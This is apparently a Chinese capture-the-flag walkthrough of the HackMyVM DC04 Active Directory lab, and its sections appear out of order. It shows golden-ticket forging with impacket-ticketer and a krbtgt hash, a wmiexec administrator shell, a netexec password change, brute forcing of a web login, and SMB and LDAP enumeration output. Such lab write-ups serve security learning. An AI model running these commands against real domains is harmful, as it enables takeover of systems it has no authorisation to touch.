no-leap\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC04]\n\u2514\u2500$ sudo date -s "2025-06-13 20:33:41"\nFri Jun 13 08:33:41 PM EDT 2025\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC04]\n\u2514\u2500$ sudo rdate -n 192.168.10.101 \nimpacket-ticketer -nthash 0f55cdc40bd8f5814587f7e6b2f85e6f -domain-sid S-1-5-21-2986980474-46765180-2505414164 -domain soupedecode.local administrator\nexport KRB5CCNAME=administrator.ccache\nimpacket-wmiexec soupedecode.local\/administrator@dc01.soupedecode.local -k -target-ip 192.168.10.101\nFri Jun 13 20:31:35 EDT 2025\nImpacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies \n\n[*] Creating basic skeleton ticket and PAC Infos\n[*] Customizing ticket for soupedecode.local\/administrator\n[*] PAC_LOGON_INFO\n[*] PAC_CLIENT_INFO_TYPE\n[*] EncTicketPart\n[*] EncAsRepPart\n[*] Signing\/Encrypting final ticket\n[*] PAC_SERVER_CHECKSUM\n[*] PAC_PRIVSVR_CHECKSUM\n[*] EncTicketPart\n[*] EncASRepPart\n[*] Saving ticket in administrator.ccache\nImpacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies \n\nPassword:\n[*] SMBv3.0 dialect used\n[!] Launching semi-interactive shell - Careful what you execute\n[!] Press help for extra shell commands\nC:\\>whoami \/all\n\nUSER INFORMATION\n----------------\n\nUser Name SID \n=============================== ===========================================\nsoupedecode.local\\administrator S-1-5-21-2986980474-46765180-2505414164-500\n\nGROUP INFORMATION\n-----------------\n\nGroup Name Type SID Attributes \n================================================== ================ =========================================== ===============================================================\nEveryone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group \nBUILTIN\\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner\nBUILTIN\\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group \nBUILTIN\\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group \nNT AUTHORITY\\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group \nNT AUTHORITY\\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group \nNT AUTHORITY\\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group \nSOUPEDECODE\\Domain Admins Group S-1-5-21-2986980474-46765180-2505414164-512 Mandatory group, Enabled by default, Enabled group \nSOUPEDECODE\\Group Policy Creator Owners Group S-1-5-21-2986980474-46765180-2505414164-520 Mandatory group, Enabled by default, Enabled group \nSOUPEDECODE\\Schema Admins Group S-1-5-21-2986980474-46765180-2505414164-518 Mandatory group, Enabled by default, Enabled group \nSOUPEDECODE\\Enterprise Admins Group S-1-5-21-2986980474-46765180-2505414164-519 Mandatory group, Enabled by default, Enabled group \nSOUPEDECODE\\Denied RODC Password Replication Group Alias S-1-5-21-2986980474-46765180-2505414164-572 Mandatory group, Enabled by default, Enabled group, Local Group\nMandatory Label\\High Mandatory Level Label S-1-16-12288 \n\nPRIVILEGES INFORMATION\n----------------------\n\nPrivilege Name Description State \n========================================= ================================================================== =======\nSeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled\nSeMachineAccountPrivilege Add workstations to domain Enabled\nSeSecurityPrivilege Manage auditing and security log Enabled\nSeTakeOwnershipPrivilege Take ownership of files or other objects Enabled\nSeLoadDriverPrivilege Load and unload device drivers Enabled\nSeSystemProfilePrivilege Profile system performance Enabled\nSeSystemtimePrivilege Change the system time Enabled\nSeProfileSingleProcessPrivilege Profile single process Enabled\nSeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled\nSeCreatePagefilePrivilege Create a pagefile Enabled\nSeBackupPrivilege Back up files and directories Enabled\nSeRestorePrivilege Restore files and directories Enabled\nSeShutdownPrivilege Shut down the system Enabled\nSeDebugPrivilege Debug programs Enabled\nSeSystemEnvironmentPrivilege Modify firmware environment values Enabled\nSeChangeNotifyPrivilege Bypass traverse checking Enabled\nSeRemoteShutdownPrivilege Force shutdown from a remote system Enabled\nSeUndockPrivilege Remove computer from docking station Enabled\nSeEnableDelegationPrivilege Enable computer and user accounts to be trusted for delegation Enabled\nSeManageVolumePrivilege Perform volume maintenance tasks Enabled\nSeImpersonatePrivilege Impersonate a client after authentication Enabled\nSeCreateGlobalPrivilege Create global objects Enabled\nSeIncreaseWorkingSetPrivilege Increase a process working set Enabled\nSeTimeZonePrivilege Change the time zone Enabled\nSeCreateSymbolicLinkPrivilege Create symbolic links Enabled\nSeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled\n\nUSER CLAIMS INFORMATION\n-----------------------\n\nUser claims unknown.\n\nKerberos support for Dynamic Access Control on this device has been disabled.\n\nC:\\>cd users\/administrator\/desktop\nC:\\users\\administrator\\desktop>ls\n'ls' is not recognized as an internal or external command,\noperable program or batch file.\n\nC:\\users\\administrator\\desktop>dir\n Volume in drive C has no label.\n Volume Serial Number is CCB5-C4FB\n\n Directory of C:\\users\\administrator\\desktop\n\n11\/07\/2024 12:08 PM <DIR> .\n06\/15\/2024 12:56 PM <DIR> ..\n11\/07\/2024 03:08 AM 32 root.txt\n 1 File(s) 32 bytes\n 2 Dir(s) 44,110,970,880 bytes free\n\nC:\\users\\administrator\\desktop>type root.txt\n1c66eabe105636d7e0b82ec1fa87cb7a\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC04]\n\u2514\u2500$ cat \/etc\/krb5.conf\n[libdefaults]\n default_realm = SOUPEDECODE.LOCAL\n\n[realms]\n SOUPEDECODE.LOCAL = {\n kdc = dc01.soupedecode.local\n admin_server = dc01.soupedecode.local\n }\n\n[domain_realm]\n soupedecode.local = SOUPEDECODE.LOCAL\n .soupedecode.local = SOUPEDECODE.LOCAL\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC04]\n\u2514\u2500$ tail -n 1 \/etc\/hosts\n192.168.10.101 soupedecode.local SOUPEDECODE.LOCAL<\/code><\/pre>\n\u65b0\u7684\u5bc6\u7801\u8fc7\u671f\u4fee\u6539\u65b9\u5f0f<\/h2>\n
\u5728\u7b2c\u4e09\u4e2a\u53c2\u8003wp\u53d1\u73b0\u4e86\u4e00\u79cd\u65b0\u7684\u5bc6\u7801\u8fc7\u671f\u4fee\u6539\u65b9\u5f0f\uff0c\u65e0\u9700\u6253\u5f00\u9776\u673a\u7ec8\u7aef\u8fdb\u884c\u64cd\u4f5c\uff1a<\/p>\n
netexec smb $IP -u websvc -p 'hgbepass' -M change-password -o NEWPASS='pass'<\/code><\/pre>\n\u4f46\u662f\u6211\u672c\u5730\u6ca1\u6709\u6210\u529f\uff0c\u663e\u793a\u6ca1\u8fd9\u4e2a\u6a21\u5757\u3002\u3002\u3002\u3002\u53ef\u80fd\u662f\u56e0\u4e3a\u8fd9\u4e2a\u6a21\u5757\u662f\u65b0\u4e0a\u7684\uff0c\u8fd8\u6ca1\u540c\u6b65\u5230kali\u7684\u8fd9\u4e2a\u6a21\u5757\u91cc\u53bb\uff01<\/p>\n
\u53c2\u8003<\/h2>\n
http:\/\/www.vxer.cn\/2024\/12\/10\/hackmyvm-dc04-walkthrough\/<\/a><\/p>\nhttps:\/\/sunsetaction.top\/2025\/04\/03\/HackMyVMDC04\/<\/a><\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC04]\n\u2514\u2500$ rustscan -a $IP -- -sCV\n\nOpen 192.168.10.103:53\nOpen 192.168.10.103:80\nOpen 192.168.10.103:88\nOpen 192.168.10.103:135\nOpen 192.168.10.103:139\nOpen 192.168.10.103:389\nOpen 192.168.10.103:445\nOpen 192.168.10.103:464\nOpen 192.168.10.103:593\nOpen 192.168.10.103:636\nOpen 192.168.10.103:3268\nOpen 192.168.10.103:3269\nOpen 192.168.10.103:5985\nOpen 192.168.10.103:9389\nOpen 192.168.10.103:49664\nOpen 192.168.10.103:49669\nOpen 192.168.10.103:49670\nOpen 192.168.10.103:49679\nOpen 192.168.10.103:49721\n\nPORT STATE SERVICE REASON VERSION\n53\/tcp open domain syn-ack ttl 128 Simple DNS Plus\n80\/tcp open http syn-ack ttl 128 Apache httpd 2.4.58 ((Win64) OpenSSL\/3.1.3 PHP\/8.2.12)\n|_http-title: Did not follow redirect to http:\/\/soupedecode.local\n|_http-server-header: Apache\/2.4.58 (Win64) OpenSSL\/3.1.3 PHP\/8.2.12\n| http-methods: \n|_ Supported Methods: GET HEAD POST OPTIONS\n88\/tcp open kerberos-sec syn-ack ttl 128 Microsoft Windows Kerberos (server time: 2025-06-13 20:28:35Z)\n135\/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC\n139\/tcp open netbios-ssn syn-ack ttl 128 Microsoft Windows netbios-ssn\n389\/tcp open ldap syn-ack ttl 128 Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)\n445\/tcp open microsoft-ds? syn-ack ttl 128\n464\/tcp open kpasswd5? syn-ack ttl 128\n593\/tcp open ncacn_http syn-ack ttl 128 Microsoft Windows RPC over HTTP 1.0\n636\/tcp open tcpwrapped syn-ack ttl 128\n3268\/tcp open ldap syn-ack ttl 128 Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)\n3269\/tcp open tcpwrapped syn-ack ttl 128\n5985\/tcp open http syn-ack ttl 128 Microsoft HTTPAPI httpd 2.0 (SSDP\/UPnP)\n|_http-title: Not Found\n|_http-server-header: Microsoft-HTTPAPI\/2.0\n9389\/tcp open mc-nmf syn-ack ttl 128 .NET Message Framing\n49664\/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC\n49669\/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC\n49670\/tcp open ncacn_http syn-ack ttl 128 Microsoft Windows RPC over HTTP 1.0\n49679\/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC\n49721\/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC\nMAC Address: 08:00:27:12:E9:22 (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\nService Info: Host: DC01; OS: Windows; CPE: cpe:\/o:microsoft:windows\n\nHost script results:\n| p2p-conficker: \n| Checking for Conficker.C or higher...\n| Check 1 (port 56573\/tcp): CLEAN (Timeout)\n| Check 2 (port 63368\/tcp): CLEAN (Timeout)\n| Check 3 (port 11187\/udp): CLEAN (Timeout)\n| Check 4 (port 53121\/udp): CLEAN (Timeout)\n|_ 0\/4 checks are positive: Host is CLEAN or ports are blocked\n|_clock-skew: 16h00m01s\n| smb2-security-mode: \n| 3:1:1: \n|_ Message signing enabled and required\n| nbstat: NetBIOS name: DC01, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:12:e9:22 (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\n| Names:\n| SOUPEDECODE<1c> Flags: <group><active>\n| SOUPEDECODE<00> Flags: <group><active>\n| DC01<00> Flags: <unique><active>\n| DC01<20> Flags: <unique><active>\n| SOUPEDECODE<1b> Flags: <unique><active>\n| Statistics:\n| 08:00:27:12:e9:22:00:00:00:00:00:00:00:00:00:00:00\n| 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00\n|_ 00:00:00:00:00:00:00:00:00:00:00:00:00:00\n| smb2-time: \n| date: 2025-06-13T20:29:24\n|_ start_date: N\/A<\/code><\/pre>\n\u76ee\u5f55\u626b\u63cf<\/h3>\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC04]\n\u2514\u2500$ feroxbuster -u http:\/\/$IP\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x html txt php 2>\/dev\/null\n\n403 GET 9l 30w 305c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter\n404 GET 9l 33w 302c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter\n302 GET 0l 0w 0c http:\/\/192.168.10.103\/ => http:\/\/soupedecode.local\n302 GET 0l 0w 0c http:\/\/192.168.10.103\/index.php => http:\/\/soupedecode.local\n302 GET 0l 0w 0c http:\/\/192.168.10.103\/Index.php => http:\/\/soupedecode.local\n503 GET 11l 44w 405c http:\/\/192.168.10.103\/examples\n301 GET 9l 30w 350c http:\/\/192.168.10.103\/licenses => http:\/\/192.168.10.103:8080\/licenses\/\n302 GET 0l 0w 0c http:\/\/192.168.10.103\/INDEX.php => http:\/\/soupedecode.local\n[#>------------------] - 2m 73410\/882188 15m found:6 errors:44 \n\ud83d\udea8 Caught ctrl+c \ud83d\udea8 saving scan state to ferox-http_192_168_10_103_-1749788849.state ...\n[#>------------------] - 2m 73434\/882188 15m found:6 errors:44 \n[#>------------------] - 2m 73396\/882184 696\/s http:\/\/192.168.10.103\/<\/code><\/pre>\n\u6dfb\u52a0\u4e00\u4e2adns\u89e3\u6790\uff1a<\/p>\n
192.168.10.103 soupedecode.local<\/code><\/pre>\n\u518d\u626b\u63cf\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC04]\n\u2514\u2500$ feroxbuster -u http:\/\/soupedecode.local\/ -x html txt php 2>\/dev\/null \n\n403 GET 9l 30w 308c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter\n404 GET 9l 33w 305c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter\n302 GET 0l 0w 0c http:\/\/soupedecode.local\/ => http:\/\/soupedecode.local\n302 GET 0l 0w 0c http:\/\/soupedecode.local\/index.php => http:\/\/soupedecode.local\n503 GET 11l 44w 408c http:\/\/soupedecode.local\/examples\n301 GET 9l 30w 356c http:\/\/soupedecode.local\/licenses => http:\/\/soupedecode.local:8080\/licenses\/\n200 GET 610l 1250w 38994c http:\/\/soupedecode.local\/server-status\n302 GET 0l 0w 0c http:\/\/soupedecode.local\/Index.php => http:\/\/soupedecode.local\n200 GET 1169l 7264w 102074c http:\/\/soupedecode.local\/server-info\n[####################] - 2m 120060\/120060 0s found:7 errors:0 \n[####################] - 2m 120000\/120000 1097\/s http:\/\/soupedecode.local\/<\/code><\/pre>\n\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n\u654f\u611f\u76ee\u5f55<\/h3>\n
<\/div>
\n<\/div><\/p>\n\u53d1\u73b0\u4e86\u65b0\u7684\u57df\u540d\u89e3\u6790\uff0c\u6dfb\u52a0\u4e00\u4e0b\uff1a<\/p>\n
192.168.10.103 heartbeat.soupedecode.local<\/code><\/pre>\n\u7206\u7834\u767b\u5f55\u754c\u9762<\/h3>\n
\u53d1\u73b0\u5b58\u5728\u4e00\u4e2a\u767b\u5f55\u754c\u9762\uff0c\u5c1d\u8bd5\u8fdb\u884c\u767b\u5f55\uff1a<\/p>\n
<\/div><\/p>\n\u5148\u6293\u4e2a\u5305\uff0c\u770b\u770b\u6709\u6ca1\u6709\u5565\u5ef6\u7533\uff1a<\/p>\n
POST \/login.php HTTP\/1.1\nHost: heartbeat.soupedecode.local\nContent-Length: 32\nCache-Control: max-age=0\nAccept-Language: en-US,en;q=0.9\nOrigin: http:\/\/heartbeat.soupedecode.local\nContent-Type: application\/x-www-form-urlencoded\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/136.0.0.0 Safari\/537.36\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.7\nReferer: http:\/\/heartbeat.soupedecode.local\/login.php\nAccept-Encoding: gzip, deflate, br\nCookie: PHPSESSID=5d46ucrej014bk99jhriirrfa2\nConnection: keep-alive\n\nusername=admin&password=password<\/code><\/pre>\n\u5c1d\u8bd5sql\u6ce8\u5165\uff0c\u4f46\u662f\u5931\u8d25\u4e86\u3002\u3002\u3002\u3002\u3002\u53ea\u80fd\u5c1d\u8bd5\u7206\u7834\u4e86\u3002\u3002\u3002\u3002\u53d1\u73b0\u4ed6\u662f\u4e0d\u6b63\u5e38\u54cd\u5e94\u7684\uff0c\u5c31\u662f\u8bf4\u8fd4\u56de\u6ca1\u62a5\u9519\u63d0\u793a\u7684\u3002\u3002\u3002<\/p>\n
<\/div>
\n<\/div><\/p>\n\u4e00\u76f4\u51fa\u73b0403<\/code>\u5c31\u574f\u4e8b\u4e86\u3002\u3002\u3002\u3002\u91cd\u542f\u9776\u673a\u90fd\u6ca1\u7528\uff0c\u53ea\u80fd\u91cd\u65b0\u5bfc\u5165\uff0c\u5c1d\u8bd5\u52a0\u4e2a\u5feb\u7167\uff0c\u8fd9\u4f5c\u8005\u51fa\u7684\u51e0\u4e2a windows\u00b7\u9776\u673a\u90fd\u5bb9\u6613\u51fa\u73b0\u5947\u5947\u602a\u602a\u7684\u95ee\u9898\u53ef\u89c1 windows\u9776\u673a\u7684\u591a\u53d8\u6027\u3002\u3002\u3002\u3002<\/p>\n<\/div><\/p>\n\u7b2c\u4e8c\u4e2a\u9009\u9879\uff0c\u6211\u62cd\u8fc7\u5feb\u7167\u4e86\uff0c\u6240\u4ee5\u70b9\u4e0d\u4e86\uff0c\u6b63\u5e38\u662f\u53ef\u4ee5\u70b9\u7684\uff01\u7136\u540e\u8bb0\u5f97\u4fee\u6539dns<\/code>\u89e3\u6790:<\/p>\n<\/div><\/p>\n\u5bc6\u7801\u9519\u8bef\u4f1a\u51fa\u73b0\u4ee5\u4e0bInvalid username or password.<\/code>\uff0c\u5c1d\u8bd5\u7206\u7834\u4e00\u4e0b\uff1a<\/p>\n<\/div><\/p>\n\u8fd9\u6837\u5c31\u5bf9\u4e86\uff01\uff01\uff01\u6211\u8fd9\u8fb9\u77e5\u9053\u4e0d\u591a\u6211\u5c31\u7528 kali \u7684\u514d\u8d39\u7248 burp \u4e86\uff0c\u4f1a\u7206\u7834\u5f88\u6162\uff0c\u53ef\u4ee5\u7528\u4e3b\u673a\u4e13\u4e1a\u7248\u8fdb\u884c\u7206\u7834\u4f1a\u6bd4\u8f83\u5feb\uff0c\u5982\u679c\u6b7b\u673a\u4e86\u5c31\u6062\u590d\u5feb\u7167\uff0c\u63a5\u7740\u7206\u7834\uff1a<\/p>\n
<\/div><\/p>\n\u770b\u4e00\u4e0b\u54cd\u5e94\u5305\uff1a<\/p>\n
HTTP\/1.1 200 OK\nDate: Fri, 13 Jun 2025 23:04:23 GMT\nServer: Apache\/2.4.58 (Win64) OpenSSL\/3.1.3 PHP\/8.2.12\nX-Powered-By: PHP\/8.2.12\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\nCache-Control: no-store, no-cache, must-revalidate\nPragma: no-cache\nSet-Cookie: user=admin; expires=Sat, 14 Jun 2025 00:04:23 GMT; Max-Age=3600; path=\/\nRefresh: 0; url=app.php\nContent-Length: 1913\nKeep-Alive: timeout=5, max=100\nConnection: Keep-Alive\nContent-Type: text\/html; charset=UTF-8\n\n<!DOCTYPE html>\n<html lang="en">\n<head>\n <meta charset="UTF-8">\n <meta name="viewport" content="width=device-width, initial-scale=1.0">\n <title>Login<\/title>\n <style>\n body {\n font-family: Arial, sans-serif;\n background-color: #f9f9f9;\n display: flex;\n justify-content: center;\n align-items: center;\n height: 100vh;\n margin: 0;\n }\n .container {\n background-color: #fff;\n padding: 20px;\n border-radius: 8px;\n box-shadow: 0 2px 10px rgba(0, 0, 0, 0.1);\n width: 300px;\n text-align: center;\n }\n input[type="text"], input[type="password"], input[type="submit"] {\n padding: 10px;\n margin: 10px 0;\n border: 1px solid #ccc;\n border-radius: 4px;\n width: 100%;\n }\n input[type="submit"] {\n background-color: #007bff;\n color: #fff;\n cursor: pointer;\n }\n input[type="submit"]:hover {\n background-color: #0056b3;\n }\n .message {\n padding: 10px;\n margin-top: 10px;\n border-radius: 4px;\n }\n .success {\n background-color: #d4edda;\n color: #155724;\n }\n .error {\n background-color: #f8d7da;\n color: #721c24;\n }\n <\/style>\n<\/head>\n<body>\n\n<div class="container">\n <h2>Login<\/h2>\n <form method="post" action="">\n <input type="text" name="username" placeholder="Username" required>\n <input type="password" name="password" placeholder="Password" required>\n <input type="submit" value="Login">\n <\/form>\n\n <p class="message success">Login successful! Redirecting...<\/p><\/div>\n\n<\/body>\n<\/html>\n<\/code><\/pre>\n\u5f88\u660e\u663e\u7206\u7834\u6210\u529f\u4e86\uff01\u5f97\u5230\u4e00\u4e2a\u51ed\u8bc1admin:nimda<\/code><\/p>\n\u654f\u611f\u7aef\u53e3\u4fe1\u606f\u641c\u96c6<\/h3>\nsmb\u670d\u52a1<\/h4>\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC04]\n\u2514\u2500$ enum4linux -a $IP \nStarting enum4linux v0.9.1 ( http:\/\/labs.portcullis.co.uk\/application\/enum4linux\/ ) on Fri Jun 13 03:06:42 2025\n\n =========================================( Target Information )=========================================\n\nTarget ........... 192.168.10.101\nRID Range ........ 500-550,1000-1050\nUsername ......... ''\nPassword ......... ''\nKnown Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none\n\n ===========================( Enumerating Workgroup\/Domain on 192.168.10.101 )===========================\n\n[+] Got domain\/workgroup name: SOUPEDECODE\n\n ===============================( Nbtstat Information for 192.168.10.101 )===============================\n\nLooking up status of 192.168.10.101\n DC01 <00> - B <ACTIVE> Workstation Service\n SOUPEDECODE <00> - <GROUP> B <ACTIVE> Domain\/Workgroup Name\n SOUPEDECODE <1c> - <GROUP> B <ACTIVE> Domain Controllers\n DC01 <20> - B <ACTIVE> File Server Service\n SOUPEDECODE <1b> - B <ACTIVE> Domain Master Browser\n\n MAC Address = 08-00-27-66-BA-0F\n\n ==================================( Session Check on 192.168.10.101 )==================================\n\n[E] Server doesn't allow session using username '', password ''. Aborting remainder of tests.<\/code><\/pre>\nLDAP<\/h4>\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC04]\n\u2514\u2500$ nmap -n -sV --script "ldap* and not brute" $IP\nStarting Nmap 7.95 ( https:\/\/nmap.org ) at 2025-06-13 03:07 EDT\nNmap scan report for 192.168.10.101\nHost is up (0.00092s latency).\nNot shown: 987 filtered tcp ports (no-response)\nPORT STATE SERVICE VERSION\n53\/tcp open domain Simple DNS Plus\n80\/tcp open http Apache httpd 2.4.58 ((Win64) OpenSSL\/3.1.3 PHP\/8.2.12)\n|_http-server-header: Apache\/2.4.58 (Win64) OpenSSL\/3.1.3 PHP\/8.2.12\n88\/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-06-13 23:07:23Z)\n135\/tcp open msrpc Microsoft Windows RPC\n139\/tcp open netbios-ssn Microsoft Windows netbios-ssn\n389\/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL, Site: Default-First-Site-Name)\n| ldap-rootdse: \n| LDAP Results\n| <ROOT>\n| domainFunctionality: 7\n| forestFunctionality: 7\n| domainControllerFunctionality: 7\n| rootDomainNamingContext: DC=SOUPEDECODE,DC=LOCAL\n| ldapServiceName: SOUPEDECODE.LOCAL:dc01$@SOUPEDECODE.LOCAL\n| isGlobalCatalogReady: TRUE\n| supportedSASLMechanisms: GSSAPI\n| supportedSASLMechanisms: GSS-SPNEGO\n| supportedSASLMechanisms: EXTERNAL\n| supportedSASLMechanisms: DIGEST-MD5\n| supportedLDAPVersion: 3\n| supportedLDAPVersion: 2\n| supportedLDAPPolicies: MaxPoolThreads\n| supportedLDAPPolicies: MaxPercentDirSyncRequests\n| supportedLDAPPolicies: MaxDatagramRecv\n| supportedLDAPPolicies: MaxReceiveBuffer\n| supportedLDAPPolicies: InitRecvTimeout\n| supportedLDAPPolicies: MaxConnections\n| supportedLDAPPolicies: MaxConnIdleTime\n| supportedLDAPPolicies: MaxPageSize\n| supportedLDAPPolicies: MaxBatchReturnMessages\n| supportedLDAPPolicies: MaxQueryDuration\n| supportedLDAPPolicies: MaxDirSyncDuration\n| supportedLDAPPolicies: MaxTempTableSize\n| supportedLDAPPolicies: MaxResultSetSize\n| supportedLDAPPolicies: MinResultSets\n| supportedLDAPPolicies: MaxResultSetsPerConn\n| supportedLDAPPolicies: MaxNotificationPerConn\n| supportedLDAPPolicies: MaxValRange\n| supportedLDAPPolicies: MaxValRangeTransitive\n| supportedLDAPPolicies: ThreadMemoryLimit\n| supportedLDAPPolicies: SystemMemoryLimitPercent\n| supportedControl: 1.2.840.113556.1.4.319\n| supportedControl: 1.2.840.113556.1.4.801\n| supportedControl: 1.2.840.113556.1.4.473\n| supportedControl: 1.2.840.113556.1.4.528\n| supportedControl: 1.2.840.113556.1.4.417\n| supportedControl: 1.2.840.113556.1.4.619\n| supportedControl: 1.2.840.113556.1.4.841\n| supportedControl: 1.2.840.113556.1.4.529\n| supportedControl: 1.2.840.113556.1.4.805\n| supportedControl: 1.2.840.113556.1.4.521\n| supportedControl: 1.2.840.113556.1.4.970\n| supportedControl: 1.2.840.113556.1.4.1338\n| supportedControl: 1.2.840.113556.1.4.474\n| supportedControl: 1.2.840.113556.1.4.1339\n| supportedControl: 1.2.840.113556.1.4.1340\n| supportedControl: 1.2.840.113556.1.4.1413\n| supportedControl: 2.16.840.1.113730.3.4.9\n| supportedControl: 2.16.840.1.113730.3.4.10\n| supportedControl: 1.2.840.113556.1.4.1504\n| supportedControl: 1.2.840.113556.1.4.1852\n| supportedControl: 1.2.840.113556.1.4.802\n| supportedControl: 1.2.840.113556.1.4.1907\n| supportedControl: 1.2.840.113556.1.4.1948\n| supportedControl: 1.2.840.113556.1.4.1974\n| supportedControl: 1.2.840.113556.1.4.1341\n| supportedControl: 1.2.840.113556.1.4.2026\n| supportedControl: 1.2.840.113556.1.4.2064\n| supportedControl: 1.2.840.113556.1.4.2065\n| supportedControl: 1.2.840.113556.1.4.2066\n| supportedControl: 1.2.840.113556.1.4.2090\n| supportedControl: 1.2.840.113556.1.4.2205\n| supportedControl: 1.2.840.113556.1.4.2204\n| supportedControl: 1.2.840.113556.1.4.2206\n| supportedControl: 1.2.840.113556.1.4.2211\n| supportedControl: 1.2.840.113556.1.4.2239\n| supportedControl: 1.2.840.113556.1.4.2255\n| supportedControl: 1.2.840.113556.1.4.2256\n| supportedControl: 1.2.840.113556.1.4.2309\n| supportedControl: 1.2.840.113556.1.4.2330\n| supportedControl: 1.2.840.113556.1.4.2354\n| supportedCapabilities: 1.2.840.113556.1.4.800\n| supportedCapabilities: 1.2.840.113556.1.4.1670\n| supportedCapabilities: 1.2.840.113556.1.4.1791\n| supportedCapabilities: 1.2.840.113556.1.4.1935\n| supportedCapabilities: 1.2.840.113556.1.4.2080\n| supportedCapabilities: 1.2.840.113556.1.4.2237\n| subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n| serverName: CN=DC01,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n| schemaNamingContext: CN=Schema,CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n| namingContexts: DC=SOUPEDECODE,DC=LOCAL\n| namingContexts: CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n| namingContexts: CN=Schema,CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n| namingContexts: DC=DomainDnsZones,DC=SOUPEDECODE,DC=LOCAL\n| namingContexts: DC=ForestDnsZones,DC=SOUPEDECODE,DC=LOCAL\n| isSynchronized: TRUE\n| highestCommittedUSN: 77859\n| dsServiceName: CN=NTDS Settings,CN=DC01,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n| dnsHostName: DC01.SOUPEDECODE.LOCAL\n| defaultNamingContext: DC=SOUPEDECODE,DC=LOCAL\n| currentTime: 20250613230723.0Z\n|_ configurationNamingContext: CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n445\/tcp open microsoft-ds?\n464\/tcp open kpasswd5?\n593\/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0\n636\/tcp open tcpwrapped\n3268\/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL, Site: Default-First-Site-Name)\n| ldap-rootdse: \n| LDAP Results\n| <ROOT>\n| domainFunctionality: 7\n| forestFunctionality: 7\n| domainControllerFunctionality: 7\n| rootDomainNamingContext: DC=SOUPEDECODE,DC=LOCAL\n| ldapServiceName: SOUPEDECODE.LOCAL:dc01$@SOUPEDECODE.LOCAL\n| isGlobalCatalogReady: TRUE\n| supportedSASLMechanisms: GSSAPI\n| supportedSASLMechanisms: GSS-SPNEGO\n| supportedSASLMechanisms: EXTERNAL\n| supportedSASLMechanisms: DIGEST-MD5\n| supportedLDAPVersion: 3\n| supportedLDAPVersion: 2\n| supportedLDAPPolicies: MaxPoolThreads\n| supportedLDAPPolicies: MaxPercentDirSyncRequests\n| supportedLDAPPolicies: MaxDatagramRecv\n| supportedLDAPPolicies: MaxReceiveBuffer\n| supportedLDAPPolicies: InitRecvTimeout\n| supportedLDAPPolicies: MaxConnections\n| supportedLDAPPolicies: MaxConnIdleTime\n| supportedLDAPPolicies: MaxPageSize\n| supportedLDAPPolicies: MaxBatchReturnMessages\n| supportedLDAPPolicies: MaxQueryDuration\n| supportedLDAPPolicies: MaxDirSyncDuration\n| supportedLDAPPolicies: MaxTempTableSize\n| supportedLDAPPolicies: MaxResultSetSize\n| supportedLDAPPolicies: MinResultSets\n| supportedLDAPPolicies: MaxResultSetsPerConn\n| supportedLDAPPolicies: MaxNotificationPerConn\n| supportedLDAPPolicies: MaxValRange\n| supportedLDAPPolicies: MaxValRangeTransitive\n| supportedLDAPPolicies: 